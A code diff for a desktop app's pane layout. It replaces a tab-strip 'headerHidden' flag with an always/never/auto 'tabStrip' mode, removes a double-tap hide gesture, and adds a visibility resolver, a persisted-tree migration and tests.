-96,14 +95,14 @@ function tileZoneHost(groupId: string): { chat: boolean; pane: string } | null { * Begin dragging a session — a sidebar row OR a tile's own tab (same drop * language either way: stack, split, or composer link). Sub-threshold releases * stay ordinary clicks, so `opts.onTap` (activate the tile) rides the tab's - * gesture; Esc aborts instantly. A stack/ - * split commits through `openSessionTile`, which OPENS a new tile from a sidebar - * row and MOVES the existing one when its tab is the drag source. + * gesture; Esc aborts instantly. A stack/split commits through + * `openSessionTile`, which OPENS a new tile from a sidebar row and MOVES the + * existing one when its tab is the drag source. */ export function startSessionDrag( payload: SessionDragPayload, e: ReactPointerEvent, - opts?: { double?: DoubleTapContext; onTap?: () => void } + opts?: { onTap?: () => void } ) { let zones: EngineZone[] = [] let strips: StripSnapshot[] = [] @@ -124,7 +123,6 @@ export function startSessionDrag( const restoreOpacity = source?.style.opacity ?? '' startDragSession(e, { - double: opts?.double, ghost: { label: sessionLabel(payload) }, onTap: opts?.onTap, diff --git a/apps/desktop/src/app/chat/session-tile.tsx b/apps/desktop/src/app/chat/session-tile.tsx index 0cb0c807a8..fda0fd3ef8 100644 --- a/apps/desktop/src/app/chat/session-tile.tsx +++ b/apps/desktop/src/app/chat/session-tile.tsx @@ -27,7 +27,7 @@ import { ModelMenuPanel } from '@/app/shell/model-menu-panel' import { formatRefValue } from '@/components/assistant-ui/directive-text' import { CenteredThreadSpinner } from '@/components/assistant-ui/thread/status' import { findGroupOfPane } from '@/components/pane-shell/tree/model' -import { $layoutTree, closeTreePane, moveTreePane, setTreeGroupHeaderHidden } from '@/components/pane-shell/tree/store' +import { $layoutTree, closeTreePane, moveTreePane, setTreeGroupTabStrip } from '@/components/pane-shell/tree/store' import { Button } from '@/components/ui/button' import { ConfirmDialog } from '@/components/ui/confirm-dialog' import { transcribeAudio } from '@/hermes' @@ -560,7 +560,7 @@ export function WorkspaceTabMenu({ children }: { children: React.ReactElement }) const group = tree ? findGroupOfPane(tree, 'workspace') : null if (group) { - setTreeGroupHeaderHidden(group.id, true) + setTreeGroupTabStrip(group.id, 'never') } } diff --git a/apps/desktop/src/app/contrib/controller.tsx b/apps/desktop/src/app/contrib/controller.tsx index f5d400a204..dc261d19c0 100644 --- a/apps/desktop/src/app/contrib/controller.tsx +++ b/apps/desktop/src/app/contrib/controller.tsx @@ -11,7 +11,6 @@ import { IdleMount } from '@/components/idle-mount' import { $layoutEditMode, toggleLayoutEditMode } from '@/components/pane-shell/edit-mode' import { allPaneIds, group, groupLeafIds, split } from '@/components/pane-shell/tree/model' import { LayoutTreeRoot } from '@/components/pane-shell/tree/renderer' -import type { DoubleTapContext } from '@/components/pane-shell/tree/renderer/drag-session' import { $layoutTree, bindPaneVisibility, @@ -138,14 +137,14 @@ const workspaceDragPayload = (): SessionDragPayload | null => { // The main tab drags like a session tile — drop it on a composer to link the // chat, on a zone/edge to stack/split. Defers (`false`) to the generic pane // move when there's no loaded session to carry. -const workspaceTabDrag = (event: ReactPointerEvent, onTap: () => void, double?: DoubleTapContext) => { +const workspaceTabDrag = (event: ReactPointerEvent, onTap: () => void) => { const payload = workspaceDragPayload() if (!payload) { return false } - startSessionDrag(payload, event, { double, onTap }) + startSessionDrag(payload, event, { onTap }) return true } diff --git a/apps/desktop/src/app/contrib/surfaces.tsx b/apps/desktop/src/app/contrib/surfaces.tsx index e191e40011..5353035c09 100644 --- a/apps/desktop/src/app/contrib/surfaces.tsx +++ b/apps/desktop/src/app/contrib/surfaces.tsx @@ -147,10 +147,13 @@ export const ChatRoutesSurface = memo(function ChatRoutesSurface({ /> ) - // FULL-PAGE views (not chat): a page is not a tab-able surface, so the - // zone's tab strip stands down while one is showing (paneChrome.headerVeto). + // FULL-PAGE views (not chat): a page is not a tab-able surface, so the zone's + // tab strip stands down while one is showing. That is `paneChrome.headerVeto` + // on the contribution, not a DOM marker — the `data-zone-no-header` attribute + // that used to ride this wrapper gated a body double-click toggle that no + // longer exists, and nothing has read it since. const page = (view: ReactNode) => ( -
+
{view}
) diff --git a/apps/desktop/src/components/pane-shell/tree/dock-enforce.test.ts b/apps/desktop/src/components/pane-shell/tree/dock-enforce.test.ts index 5a1e2c269b..36c9813fa9 100644 --- a/apps/desktop/src/components/pane-shell/tree/dock-enforce.test.ts +++ b/apps/desktop/src/components/pane-shell/tree/dock-enforce.test.ts @@ -180,11 +180,12 @@ describe('enforced dock (stacked Bots pane → sessions-zone tab, every boot)', expect(group.panes).toEqual(['sessions', 'hermes-bots:pane']) }) - it('forces the tab strip visible when already co-located but hidden with bots active (community "only Bots shows" regression)', async () => { + it('shows the tab strip when already co-located but hidden with bots active (community "only Bots shows" regression)', async () => { // The Aug 2026 field reports: sessions+bots already share one group, the - // strip is hidden (headerHidden), and bots holds the active tab — the - // sessions pane exists but is unreachable. The re-home path never runs - // (nothing to move), so the enforce must repair reachability directly. + // legacy strip flag is set, and bots holds the active tab — the sessions + // pane exists but is unreachable. The re-home path never runs (nothing to + // move), so reachability has to come from somewhere else: the migration + // drops the legacy flag, and a two-pane zone on auto shows its strip. const hiddenStackedTree = { type: 'split', id: 'root', @@ -208,10 +209,10 @@ describe('enforced dock (stacked Bots pane → sessions-zone tab, every boot)', const group = model.findGroupOfPane(tree.$layoutTree.get()!, 'hermes-bots:pane')! - // Both panes stay put — but the strip is forced visible so SESSIONS is - // reachable again. The active tab is NOT stolen mid-boot. + // Both panes stay put — but the strip is visible so SESSIONS is reachable + // again. The active tab is NOT stolen mid-boot. expect(group.panes).toEqual(['sessions', 'hermes-bots:pane']) - expect(group.headerHidden).not.toBe(true) + expect(tree.tabStripVisibleForGroup(group)).toBe(true) }) it('re-homes an edge-enforced pane stranded in the sessions tab strip', async () => { diff --git a/apps/desktop/src/components/pane-shell/tree/model.ts b/apps/desktop/src/components/pane-shell/tree/model.ts index 2f87f80777..5fce015b6c 100644 --- a/apps/desktop/src/components/pane-shell/tree/model.ts +++ b/apps/desktop/src/components/pane-shell/tree/model.ts @@ -15,6 +15,20 @@ export type Orientation = 'row' | 'column' +/** + * A zone's STANDING CHOICE about its tab strip. Absent is the third value and + * the default: AUTO, where the strip's presence is a pure function of what the + * zone currently holds (see `resolveTabStripVisible`). + * + * This replaced a `headerHidden?: boolean` that tried to carry both the user's + * choice and the layout's own repairs in one field. `false` there meant either + * "the user wants the strip" or "some code path pinned it visible to escape a + * dead end" — insert, tab cycling, dock enforcement and pane adoption all wrote + * it — so a repair permanently overwrote a choice and neither could be read + * back. Only the user writes `tabStrip`; everything else asks AUTO. + */ +export type TabStripMode = 'always' | 'never' + export interface SplitNode { type: 'split' id: string @@ -33,12 +47,10 @@ export interface GroupNode { active: string /** Collapsed to header strip (chevron restores). */ minimized?: boolean - /** - * Header hidden entirely (double-click the header to hide, double-click the - * zone's top edge to bring it back). Minimize always shows the header — - * a minimized group IS its header. - */ - headerHidden?: boolean + /** The user's standing choice for this zone's strip; absent = auto. Written + * only by the zone menu and the toggle command. Minimize ignores it — a + * minimized group IS its strip. */ + tabStrip?: TabStripMode } export type LayoutNode = SplitNode | GroupNode @@ -57,7 +69,7 @@ export const group = (panes: string[], options?: Partial= 0 ? [...n.panes.slice(0, at), paneId, ...n.panes.slice(at)] : [...n.panes, paneId] - // Gaining a pane pins the header EXPLICITLY shown (not just cleared): - // a stack you can't see is a trap, and once a zone has ever stacked - // the bar STAYS when it drops back to one tab — the auto-hide flicker - // while dragging tabs around felt broken. Hiding is the user's call - // (double-click / zone menu). Active moves only on a gesture; an empty - // target has no prior tab, so the newcomer takes it regardless. + // `tabStrip` is NOT touched. Gaining a pane used to pin the strip + // visible so a surprise arrival always had a handle, which is how a + // deliberate hide came undone by a background adoption. Reachability + // is the resolver's job now, and it answers per-pane: a closeable tile + // forces the strip open, a stack of tool panels doesn't need it + // because tab cycling already reaches every member. + // Active moves only on a gesture; an empty target has no prior tab, so + // the newcomer takes it regardless. const active = activate || n.panes.length === 0 ? paneId : n.active - return { ...n, panes, active, headerHidden: false } + return { ...n, panes, active } } const orientation: Orientation = pos === 'left' || pos === 'right' ? 'row' : 'column' @@ -530,8 +542,9 @@ export function setGroupMinimized(root: LayoutNode, groupId: string, minimized: return mapGroups(root, g => (g.id === groupId ? { ...g, minimized } : g)) } -export function setGroupHeaderHidden(root: LayoutNode, groupId: string, headerHidden: boolean): LayoutNode { - return mapGroups(root, g => (g.id === groupId ? { ...g, headerHidden } : g)) +/** Write a zone's standing strip choice; `undefined` returns it to auto. */ +export function setGroupTabStrip(root: LayoutNode, groupId: string, tabStrip: TabStripMode | undefined): LayoutNode { + return mapGroups(root, g => (g.id === groupId ? { ...g, tabStrip } : g)) } function replaceNode(node: LayoutNode, id: string, make: (g: GroupNode) => LayoutNode): LayoutNode { @@ -577,6 +590,33 @@ export function setSplitWeights(root: LayoutNode, splitId: string, weights: numb // Validation (persisted trees are untrusted) // --------------------------------------------------------------------------- +/** + * Bring a persisted tree onto the current attribute schema. + * + * Retires `headerHidden` outright rather than translating it. A stored `true` + * could have come from a deliberate "Hide header", or from a double-tap the + * user never meant (that gesture rode every tab, so an ordinary double-click + * on a title hid the strip), and nothing on disk distinguishes them. Since the + * hide also unmounted the only surface offering "Show header", every wrongly + * hidden zone stayed hidden across restarts — the state people actually + * reported being stuck in. Carrying those forward as `tabStrip: 'never'` would + * re-strand exactly them, so the flag is dropped and the zone returns to auto; + * the strip is now hidden deliberately, from controls that say how to undo it. + * + * A stored `false` is dropped for the same reason in reverse: most were written + * by the layout's own repair paths, not by anyone choosing to see a strip. + */ +export function migratePersistedTree(node: LayoutNode): LayoutNode { + if (node.type === 'group') { + const { headerHidden, ...rest } = node as GroupNode & { headerHidden?: unknown } + const tabStrip = rest.tabStrip === 'always' || rest.tabStrip === 'never' ? rest.tabStrip : undefined + + return headerHidden === undefined && rest.tabStrip === tabStrip ? node : { ...rest, tabStrip } + } + + return { ...node, children: node.children.map(migratePersistedTree) } +} + export function isLayoutNode(value: unknown): value is LayoutNode { if (!value || typeof value !== 'object') { return false diff --git a/apps/desktop/src/components/pane-shell/tree/renderer/drag-session.ts b/apps/desktop/src/components/pane-shell/tree/renderer/drag-session.ts index 826f15d4b9..594ef3ed53 100644 --- a/apps/desktop/src/components/pane-shell/tree/renderer/drag-session.ts +++ b/apps/desktop/src/components/pane-shell/tree/renderer/drag-session.ts @@ -155,17 +155,10 @@ const sameHint = (a: DropHint | null, b: DropHint | null) => (a?.groupIds?.length ?? 0) === (b?.groupIds?.length ?? 0) && (a?.groupIds ?? []).every((id, i) => b?.groupIds?.[i] === id) -/** Double-tap detection for drag handles. Pane handles preventDefault - * pointerdown, which suppresses native `dblclick` — so rapid same-handle - * taps are detected here instead. */ -const DOUBLE_TAP_MS = 400 -let lastTap: { key: string; time: number } | null = null - -export interface DoubleTapContext { - /** Two sub-threshold releases with the same key within DOUBLE_TAP_MS. */ - key: string - onDoubleTap: () => void -} +// Drag handles carry NO double-tap. Handles preventDefault pointerdown, so a +// synthesized one is the only way to get it here — and a gesture this machinery +// hands to every handle at once is the wrong home for anything destructive. +// Trackpad double-tap is a separate concern: `@/lib/trackpad-gestures`. // --------------------------------------------------------------------------- // The generic drag session (machinery) — resolvers plug in below / elsewhere. @@ -186,7 +179,6 @@ export interface DragSessionSpec { onEnd?(): void /** Sub-threshold release = a click on the handle. */ onTap?(): void - double?: DoubleTapContext /** Floating chip following the pointer — for drags whose source doesn't * stay visibly "held" (a sidebar row, unlike a dimmed tab). See * `@/lib/drag-ghost`. */ @@ -218,10 +210,10 @@ function suppressDragClick(committed: boolean) { /** * Begin a drag session from a handle's pointerdown. A sub-threshold release - * is a click (`onTap` / `double.onDoubleTap`); past the threshold the spec's - * resolver owns targeting and the machinery owns everything else. Esc aborts - * instantly: the session registers as the TOP escape layer, tears down - * synchronously, and nothing commits. + * is a click (`onTap`); past the threshold the spec's resolver owns targeting + * and the machinery owns everything else. Esc aborts instantly: the session + * registers as the TOP escape layer, tears down synchronously, and nothing + * commits. */ export function startDragSession(e: ReactPointerEvent, spec: DragSessionSpec) { if (e.button !== 0) { @@ -365,15 +357,7 @@ export function startDragSession(e: ReactPointerEvent, spec: DragSe spec.onCommit($dropHint.get()) } } else if (commit) { - const now = Date.now() - - if (spec.double && lastTap?.key === spec.double.key && now - lastTap.time < DOUBLE_TAP_MS) { - lastTap = null - spec.double.onDoubleTap() - } else { - lastTap = spec.double ? { key: spec.double.key, time: now } : null - spec.onTap?.() - } + spec.onTap?.() } spec.onEnd?.() @@ -418,14 +402,13 @@ const TEAR_OFF_SLACK_PX = 18 /** * Begin a pane drag from any handle. A sub-threshold release is a click - * (`onTap`, used to activate tabs; rapid repeat fires `double.onDoubleTap` - * instead). With a `reorder` context (tab drags), movement inside the strip - * targets an insertion slot — the strip renders a divider at it, NOTHING - * moves until release (placement-on-release, like every other drop); tearing - * away from the strip converts the drag into a zone move. Zone mode: zones - * light up, the target's tab strip stacks at its divider slot, Shift extends - * the highlight range, release drops into the ClosestCenter primary zone. - * Esc aborts either mode. + * (`onTap`, used to activate tabs). With a `reorder` context (tab drags), + * movement inside the strip targets an insertion slot — the strip renders a + * divider at it, NOTHING moves until release (placement-on-release, like every + * other drop); tearing away from the strip converts the drag into a zone move. + * Zone mode: zones light up, the target's tab strip stacks at its divider slot, + * Shift extends the highlight range, release drops into the ClosestCenter + * primary zone. Esc aborts either mode. * * `ghostLabel` opts into the pointer-following chip (`@/lib/drag-ghost`) — the * same "what am I holding" affordance sessions use. The in-strip dim only @@ -437,7 +420,6 @@ export function startPaneDrag( e: ReactPointerEvent, onTap?: () => void, reorder?: ReorderContext, - double?: DoubleTapContext, ghostLabel?: string, /** Multi-tab selection riding this drag (strip order, includes `paneId`). * The whole block moves/reorders together; `paneId` stays the pressed tab @@ -504,7 +486,6 @@ export function startPaneDrag( Boolean(reorder) && rectContains(reorderStrip().rect, x, y, TEAR_OFF_SLACK_PX) startDragSession(e, { - double, ghost: ghostLabel ? { label: ghostLabel } : undefined, onTap, diff --git a/apps/desktop/src/components/pane-shell/tree/renderer/lone-header.test.ts b/apps/desktop/src/components/pane-shell/tree/renderer/lone-header.test.ts deleted file mode 100644 index a16ad0e67a..0000000000 --- a/apps/desktop/src/components/pane-shell/tree/renderer/lone-header.test.ts +++ /dev/null @@ -1,37 +0,0 @@ -import { describe, expect, it } from 'vitest' - -import { forceLoneHeaderForPanes } from './lone-header' - -describe('forceLoneHeaderForPanes', () => { - const chrome = - (placement?: string, uncloseable = false) => - () => ({ placement, uncloseable }) - - const noCollapse = () => false - - // Every mirrored tile (session / page / preview) is a closeable `main` pane, so - // dragging one into a zone of its own must keep its tab — it used to strand a - // preview headerless, with nothing to grab and no ✕. - it('forces a header for closeable placement:main panes', () => { - expect(forceLoneHeaderForPanes(['preview-tile:url:x'], chrome('main'), noCollapse)).toBe(true) - expect(forceLoneHeaderForPanes(['session-tile:abc'], chrome('main'), noCollapse)).toBe(true) - }) - - it('forces a header for a lone collapse tool pane', () => { - expect( - forceLoneHeaderForPanes( - ['terminal'], - () => ({}), - id => id === 'terminal' - ) - ).toBe(true) - }) - - it('leaves a lone uncloseable workspace headerless', () => { - expect(forceLoneHeaderForPanes(['workspace'], chrome('main', true), noCollapse)).toBe(false) - }) - - it('leaves standing side chrome (files / sessions) headerless', () => { - expect(forceLoneHeaderForPanes(['files'], chrome('right'), noCollapse)).toBe(false) - }) -}) diff --git a/apps/desktop/src/components/pane-shell/tree/renderer/lone-header.ts b/apps/desktop/src/components/pane-shell/tree/renderer/lone-header.ts deleted file mode 100644 index 4fe0d97757..0000000000 --- a/apps/desktop/src/components/pane-shell/tree/renderer/lone-header.ts +++ /dev/null @@ -1,35 +0,0 @@ -/** - * When a lone pane must keep its tab strip (name card + close). - * - * Default: a single pane isn't a "tab", so the header auto-hides. Exceptions - * force it on so a closeable surface never becomes an unclosable dead zone: - * - a closeable `placement: 'main'` pane — every mirrored TILE (a session, a - * page, a preview) is one, so dragging a tile into a zone of its own keeps - * its tab and its ✕ - * - a collapse tool panel dragged into its own zone - */ - -export interface LoneHeaderChrome { - placement?: string - uncloseable?: boolean -} - -export function forceLoneHeaderForPanes( - shown: readonly string[], - chromeOf: (id: string) => LoneHeaderChrome, - isCollapsePane: (id: string) => boolean -): boolean { - // "This pane can be closed, so it must expose the ✕." Only the uncloseable - // workspace is exempt; standing side chrome (files / sessions) isn't 'main'. - if ( - shown.some(id => { - const chrome = chromeOf(id) - - return !chrome.uncloseable && chrome.placement === 'main' - }) - ) { - return true - } - - return shown.length === 1 && isCollapsePane(shown[0]) -} diff --git a/apps/desktop/src/components/pane-shell/tree/renderer/strip-visibility.test.ts b/apps/desktop/src/components/pane-shell/tree/renderer/strip-visibility.test.ts new file mode 100644 index 0000000000..4dcda83b57 --- /dev/null +++ b/apps/desktop/src/components/pane-shell/tree/renderer/strip-visibility.test.ts @@ -0,0 +1,113 @@ +import { afterEach, describe, expect, it } from 'vitest' + +import type { Contribution } from '@/contrib/types' +import { setTabStripDefault } from '@/store/tabstrip-prefs' + +import { resolveTabStripVisible, type StripPane, tabStripVisibleForZone } from './strip-visibility' + +const tile = (): StripPane => ({ collapsePane: false, placement: 'main' }) +const workspace = (): StripPane => ({ collapsePane: false, placement: 'main', uncloseable: true }) +const toolPanel = (): StripPane => ({ collapsePane: true, placement: 'bottom' }) +const sideChrome = (): StripPane => ({ collapsePane: false, placement: 'right' }) + +describe('auto (no stored choice)', () => { + it('gives a lone workspace no strip and a stack of two a strip', () => { + expect(resolveTabStripVisible({ shown: [workspace()] })).toBe(false) + expect(resolveTabStripVisible({ shown: [workspace(), sideChrome()] })).toBe(true) + }) + + it('leaves standing side chrome alone in its own zone', () => { + expect(resolveTabStripVisible({ shown: [sideChrome()] })).toBe(false) + }) + + it('has nothing to draw for an empty zone', () => { + expect(resolveTabStripVisible({ shown: [] })).toBe(false) + }) +}) + +describe('the stored choice', () => { + it('overrides auto in both directions', () => { + expect(resolveTabStripVisible({ mode: 'always', shown: [workspace()] })).toBe(true) + expect(resolveTabStripVisible({ mode: 'never', shown: [workspace(), sideChrome()] })).toBe(false) + }) +}) + +// THE invariant the old boolean could not hold. `never` used to sit above the +// force-visible rule, so hiding a zone that held only a closeable tile left a +// surface with no tab, no ✕ and no menu — the "how do I get it back" reports. +describe('no dead zone', () => { + it('keeps the strip for a closeable tile even when the zone says never', () => { + expect(resolveTabStripVisible({ mode: 'never', shown: [tile()] })).toBe(true) + }) + + it('keeps the strip for a lone tool panel even when the zone says never', () => { + expect(resolveTabStripVisible({ mode: 'never', shown: [toolPanel()] })).toBe(true) + }) + + it('still hides a zone that cannot strand anything', () => { + // The workspace is uncloseable, and a stack is reachable by tab cycling — + // the invariant protects handles, it does not veto hiding as such. + expect(resolveTabStripVisible({ mode: 'never', shown: [workspace()] })).toBe(false) + expect(resolveTabStripVisible({ mode: 'never', shown: [toolPanel(), toolPanel()] })).toBe(false) + }) +}) + +// A full-page view is not a tab-able surface, and it lifts itself the moment +// the chat comes back — so it outranks even the stranding rule and, unlike +// `mode`, is never written to the tree. +describe('a full-page view', () => { + it('suppresses the strip regardless of what the zone holds or says', () => { + expect(resolveTabStripVisible({ headerVeto: true, mode: 'always', shown: [tile()] })).toBe(false) + expect(resolveTabStripVisible({ headerVeto: true, shown: [workspace(), tile()] })).toBe(false) + }) +}) + +// The adapter both TreeGroup and the store call. Its job is to read the same +// chrome flags and fold in the app-wide default on both paths, so the strip on +// screen and the toggle command can never disagree. +describe('tabStripVisibleForZone', () => { + const contributions: Record = { + terminal: { area: 'panes', data: { placement: 'bottom' }, id: 'terminal', render: () => null, title: 'terminal' }, + 'tile:a': { area: 'panes', data: { placement: 'main' }, id: 'tile:a', render: () => null, title: 'tile' }, + workspace: { + area: 'panes', + data: { placement: 'main', uncloseable: true }, + id: 'workspace', + render: () => null, + title: 'chat' + } + } + + const visible = (shown: string[], mode?: 'always' | 'never') => + tabStripVisibleForZone({ + active: shown[0], + isCollapsePane: id => id === 'terminal', + mode, + paneFor: id => contributions[id], + shown + }) + + afterEach(() => setTabStripDefault('auto')) + + it('reads placement, uncloseable and collapse off the contributions', () => { + expect(visible(['workspace'])).toBe(false) + expect(visible(['tile:a'], 'never')).toBe(true) + expect(visible(['terminal'], 'never')).toBe(true) + }) + + it('falls back to the app default when the zone has no choice', () => { + setTabStripDefault('always') + expect(visible(['workspace'])).toBe(true) + + setTabStripDefault('never') + expect(visible(['workspace', 'terminal'])).toBe(false) + }) + + it("lets a zone's own choice beat the app default", () => { + setTabStripDefault('never') + expect(visible(['workspace'], 'always')).toBe(true) + + setTabStripDefault('always') + expect(visible(['workspace'], 'never')).toBe(false) + }) +}) diff --git a/apps/desktop/src/components/pane-shell/tree/renderer/strip-visibility.ts b/apps/desktop/src/components/pane-shell/tree/renderer/strip-visibility.ts new file mode 100644 index 0000000000..0ff5ee1e63 --- /dev/null +++ b/apps/desktop/src/components/pane-shell/tree/renderer/strip-visibility.ts @@ -0,0 +1,108 @@ +/** + * Does this zone show its tab strip? One resolver, one precedence order, so + * every caller gets the same answer and the rule can be read in one place. + * + * The decision used to be an inline expression in TreeGroup fed by a flag four + * other code paths also wrote to, which is how a zone could end up with no + * strip, no tab, no ✕ and no menu to get any of them back. The ladder below is + * the whole policy; nothing outside `mode` is persisted, so a zone's chrome is + * a function of what it currently holds plus one deliberate choice. + */ + +import type { Contribution } from '@/contrib/types' +import { effectiveTabStripMode } from '@/store/tabstrip-prefs' + +import type { TabStripMode } from '../model' + +import { paneChrome } from './track-model' + +export interface StripPane { + /** A tool panel (terminal / logs) that collapses rather than closes. */ + collapsePane: boolean + /** Contribution placement — `'main'` marks a docked tile (session, page, + * preview) as opposed to standing side chrome. */ + placement?: string + /** Panes that never leave the tree (the workspace). */ + uncloseable?: boolean +} + +export interface StripZone { + /** The ACTIVE pane declines to be tabbed (a full-page view). */ + headerVeto?: boolean + /** The zone's standing choice; undefined = auto. */ + mode?: TabStripMode + /** Panes currently rendered as chips — chrome-hidden and narrow-collapsed + * panes are already filtered out. */ + shown: readonly StripPane[] +} + +/** + * A pane is STRANDED without a strip when the strip is the only thing carrying + * its handle: a closeable tile needs its ✕, a lone tool panel needs a chip to + * grab. The uncloseable workspace is not strandable — it cannot be closed or + * lost, so a lone chat is free to be chromeless. + * + * This outranks an explicit `never` on purpose. "Hide the strip" is a request + * about chrome, never a request to make a surface unreachable, and a zone that + * answers no gesture at all is not a state any setting should be able to + * produce. Hiding still works everywhere it cannot trap you. + */ +function stranded(shown: readonly StripPane[]): boolean { + if (shown.some(pane => !pane.uncloseable && pane.placement === 'main')) { + return true + } + + return shown.length === 1 && shown[0].collapsePane +} + +export function resolveTabStripVisible(zone: StripZone): boolean { + if (zone.shown.length === 0) { + return false + } + + // A page is not a tab-able surface. Contextual and self-lifting: the strip + // returns with the chat, so it is resolved ahead of any stored choice and + // never written down. + if (zone.headerVeto) { + return false + } + + if (stranded(zone.shown)) { + return true + } + + if (zone.mode) { + return zone.mode === 'always' + } + + // Auto: a lone pane is not a "tab", so it goes without a strip; two or more + // need one to switch between them. + return zone.shown.length > 1 +} + +/** + * Resolve a zone straight from what the layout knows about it. Both callers — + * TreeGroup from its render inputs, the store from the registry — go through + * here, so neither can drift on which chrome flags feed the answer or forget to + * fold in the app-wide default. + */ +export function tabStripVisibleForZone(zone: { + /** The zone's ACTIVE pane. */ + active: string + isCollapsePane: (id: string) => boolean + /** The zone's own choice, before the app default applies. */ + mode: TabStripMode | undefined + paneFor: (id: string) => Contribution | undefined + /** Panes currently rendered as chips. */ + shown: readonly string[] +}): boolean { + return resolveTabStripVisible({ + headerVeto: paneChrome(zone.paneFor(zone.active)).headerVeto, + mode: effectiveTabStripMode(zone.mode), + shown: zone.shown.map(id => ({ + collapsePane: zone.isCollapsePane(id), + placement: paneChrome(zone.paneFor(id)).placement, + uncloseable: paneChrome(zone.paneFor(id)).uncloseable + })) + }) +} diff --git a/apps/desktop/src/components/pane-shell/tree/renderer/tab-strip-hide.test.tsx b/apps/desktop/src/components/pane-shell/tree/renderer/tab-strip-hide.test.tsx index 415c87965f..a0641257c7 100644 --- a/apps/desktop/src/components/pane-shell/tree/renderer/tab-strip-hide.test.tsx +++ b/apps/desktop/src/components/pane-shell/tree/renderer/tab-strip-hide.test.tsx @@ -4,8 +4,15 @@ import { afterEach, beforeAll, beforeEach, describe, expect, it, vi } from 'vite import { registry } from '@/contrib/registry' -import { group, split } from '../model' -import { $layoutTree, markCollapsePane, registerPaneCloser } from '../store' +import { group, type GroupNode, split } from '../model' +import { + $layoutTree, + markCollapsePane, + registerPaneCloser, + setTreeGroupTabStrip, + tabStripVisibleForGroup, + toggleTargetZoneTabStrip +} from '../store' import { TreeGroup } from './tree-group' @@ -16,8 +23,9 @@ function LiveTreeGroup() { return } -// Pins the tab-strip hide grammar: the double-tap hide belongs to the STRIP -// BACKGROUND alone — tabs are activate-only and must never hide the bar. +// Pins the tab-strip hide grammar. Hiding is a COMMAND now, not a gesture: the +// pointer can no longer take the strip away by accident, and whatever does take +// it away leaves a way back that does not depend on the chrome it just removed. class TestResizeObserver { observe() {} @@ -53,6 +61,8 @@ beforeEach(async () => { markCollapsePane('terminal') registerPaneCloser('terminal', () => undefined) + + $layoutTree.set(split('column', [group(['workspace', 'terminal'], { active: 'terminal', id: 'grp-main' })])) }) afterEach(() => { @@ -69,13 +79,13 @@ const zoneAt = (index: number) => { const groupNode = () => { const node = $layoutTree.get()! - return (node.type === 'split' ? node.children[0] : node) as { headerHidden?: boolean; panes: string[] } + return (node.type === 'split' ? node.children[0] : node) as GroupNode } const tablist = () => globalThis.document.querySelector('[role="tablist"]') /** Two sub-threshold taps: pointerdown on the target, pointerup on window - * (drag-session listens there), twice — the synthesized double-tap path. */ + * (drag-session listens there), twice — the retired double-tap path. */ const doubleTap = (target: Element) => { for (let i = 0; i < 2; i++) { fireEvent.pointerDown(target, { button: 0, clientX: 10, clientY: 10, pointerType: 'mouse' }) @@ -84,35 +94,33 @@ const doubleTap = (target: Element) => { } describe('tab strip hide grammar', () => { - it('double-clicking a tab does NOT hide the strip', () => { - // $layoutTree.set, not declareDefaultTree — the latter only adopts into an - // existing tree, and the store is module state that survives between tests. - $layoutTree.set( - split('column', [group(['workspace', 'terminal'], { active: 'terminal', id: 'grp-main' })]) - ) + it('no pointer gesture hides the strip', () => { render() - const tab = globalThis.document.querySelector('[data-tree-tab="terminal"]') - expect(tab).toBeTruthy() + // Both halves of the strip: the tab, which was always activate-only, and + // the background, which used to answer a double-tap nothing announced. + doubleTap(globalThis.document.querySelector('[data-tree-tab="terminal"]')!) + doubleTap(globalThis.document.querySelector('[data-zone-tabstrip="grp-main"]')!) - doubleTap(tab!) - - // The strip is still there and the tree never recorded a hide. expect(tablist()).toBeTruthy() - expect(groupNode().headerHidden).not.toBe(true) + expect(groupNode().tabStrip).toBeUndefined() }) - it('double-tapping the strip background still hides the header (documented gesture)', () => { - $layoutTree.set( - split('column', [group(['workspace', 'terminal'], { active: 'terminal', id: 'grp-main' })]) - ) + it('renders no strip at all for a zone set to never', () => { + setTreeGroupTabStrip('grp-main', 'never') render() - const strip = globalThis.document.querySelector('[data-zone-tabstrip="grp-main"]') - expect(strip).toBeTruthy() + expect(tablist()).toBeNull() + }) - doubleTap(strip!) + // The state that had no way out. The command targets the zone by + // hover/focus/workspace fallback, so restoring the strip never depends on + // the strip — or on any other chrome the hide took away. + it('the toggle command reaches a zone that has no chrome left to click', () => { + setTreeGroupTabStrip('grp-main', 'never') + expect(tabStripVisibleForGroup(groupNode())).toBe(false) - expect(groupNode().headerHidden).toBe(true) + expect(toggleTargetZoneTabStrip()).toBe('always') + expect(tabStripVisibleForGroup(groupNode())).toBe(true) }) }) diff --git a/apps/desktop/src/components/pane-shell/tree/renderer/track-model.ts b/apps/desktop/src/components/pane-shell/tree/renderer/track-model.ts index 785ea7519d..565c613e32 100644 --- a/apps/desktop/src/components/pane-shell/tree/renderer/track-model.ts +++ b/apps/desktop/src/components/pane-shell/tree/renderer/track-model.ts @@ -14,7 +14,6 @@ import type { Contribution } from '@/contrib/types' import type { GroupNode, LayoutNode } from '../model' import { allPaneIds } from '../model' -import type { DoubleTapContext } from './drag-session' import type { FloatingAnchor } from './floating-rect' export const MIN_PANE_PX = 80 @@ -78,10 +77,10 @@ interface PaneChrome extends PaneSizing { tabWrap?: (tab: React.ReactElement) => React.ReactNode /** Override this pane's TAB drag (a session tab drags like a sidebar row — * stack / split / composer-link — not the generic pane move). Given the - * tab's tap (activate) + double-tap (hide header) so those gestures survive. - * Returns whether it took the drag; `false` (or absent) defers to - * `startPaneDrag` — e.g. the workspace tab on a fresh draft, nothing to link. */ - tabDrag?: (event: React.PointerEvent, onTap: () => void, double?: DoubleTapContext) => boolean + * tab's tap (activate) so that gesture survives. Returns whether it took the + * drag; `false` (or absent) defers to `startPaneDrag` — e.g. the workspace + * tab on a fresh draft, nothing to link. */ + tabDrag?: (event: React.PointerEvent, onTap: () => void) => boolean /** Suppress the zone header while THIS pane is active — full-page views * (artifacts/skills/plugin pages) are not tab-able surfaces. The flag is * live: the workspace contribution re-registers it on route changes. */ diff --git a/apps/desktop/src/components/pane-shell/tree/renderer/tree-group.test.tsx b/apps/desktop/src/components/pane-shell/tree/renderer/tree-group.test.tsx index 8241ae1b50..e1d4b5d56d 100644 --- a/apps/desktop/src/components/pane-shell/tree/renderer/tree-group.test.tsx +++ b/apps/desktop/src/components/pane-shell/tree/renderer/tree-group.test.tsx @@ -27,10 +27,12 @@ function render(ui: ReactNode) { function terminalGroup(minimized: boolean): GroupNode { return { active: 'terminal', - headerHidden: false, id: 'terminal-zone', minimized, panes: ['terminal'], + // The chevron lives in the strip, so this zone has to be showing one. A + // lone 